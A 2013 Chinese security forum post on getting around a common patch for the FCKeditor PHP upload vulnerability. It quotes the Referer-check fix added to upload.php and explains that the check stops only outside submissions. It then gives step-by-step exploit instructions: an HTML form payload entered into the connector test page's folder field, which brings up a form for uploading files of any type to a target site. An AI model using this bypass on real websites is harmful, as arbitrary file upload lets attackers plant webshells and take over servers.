找回密码
 立即注册
欢迎中测联盟老会员回家,1997年注册的域名
查看: 2310|回复: 0
打印 上一主题 下一主题

fckeditor 漏洞修复后的二次利用

[复制链接]
跳转到指定楼层
楼主
发表于 2013-1-11 21:12:44 | 只看该作者 回帖奖励 |倒序浏览 |阅读模式
漏洞文件:editors/fckeditor/editor/filemanager/upload/php/upload.php1 K+ Q+ `8 A3 J' x+ q  w
网上给出的修复方案是6 @4 G4 |/ I6 D* r) A" [; O! O
修复方法,删除FCK编辑器用其他的编辑器
5 `7 W; N3 ~2 N6 U" }或者找到 editors/fckeditor/editor/filemanager/upload/php/upload.php 文件
3 s/ Y$ w& o0 }4 b/ I8 D9 d( f  y9 p, s1 S
require(‘config.php’);
. f5 U9 [7 H) R& v) v/ b8 {9 Srequire(‘util.php’);
$ \1 d+ f7 G- Q$ `$ w的下面添加以下代码—————————–
) m0 l: g4 t2 v4 P4 O9 N" k: o+ g0 B: O0 D//防止外部提交
% ?/ U6 l+ G  q5 O3 tfunction outsidepost()# V, B' D1 _2 o  A! @
{
5 l1 v8 ]- p+ C& T+ x$servername=$_SERVER['SERVER_NAME'];
/ G1 I, G9 T' Q4 a$sub_from=@$_SERVER['HTTP_REFERER'];  A6 A: r9 z( T' i, }  }) C( a# Q1 U
$sub_len=strlen($servername);
, F4 C) M% O4 r/ l: R- M$checkfrom=substr($sub_from,7,$sub_len);' v, O( E+ o! r6 X9 z
if($checkfrom!=$servername){' j: D- \" v1 b( R# {& Q  W. Y
echo(“you don’t outsidepost!”);
- H# h+ b+ i& F# H2 I+ m- j$ }exit;
2 e, p* d9 u8 A7 Z# `$ o6 S( T}& t7 T+ K/ F" B% w% e' R! E& }$ u
}; r# b* G) U+ L7 f  j+ p, K; E, C
outsidepost();3 H9 M$ r% g# G  C2 G' ~/ b8 H
防止外部提交,但是没有防止内部提交,7 |( `! L+ J' m
利用方法:
4 e& D# h; k# u' w* l1,打开 editors/fckeditor/editor/filemanager/browser/default/connectors/test.html! D/ F% a# W* d6 H6 X' [) ]1 A
2,在Current Folder 框输入  X' i5 l! }" h4 _- j
<form id=frmUpload enctype=multipart/form-data action=http://www.url.com/editors/fckeditor/editor/filemanager/upload/php/upload.php?Type=Media method=post>Upload a new file:<br><input type=file name=NewFile size=50><br><input id=btnUpload type=submit value=Upload></form>
; V" J( }6 J. k3 q然后 Get Folders and Files 就会出现一个上传表单,即可上传任意文件类型。, q! i; y2 G7 f. i; F
PS:如果 editors与上传的文件夹设置了403 500 404 权限 利用就无效了。
回复

使用道具 举报

您需要登录后才可以回帖 登录 | 立即注册

本版积分规则

快速回复 返回顶部 返回列表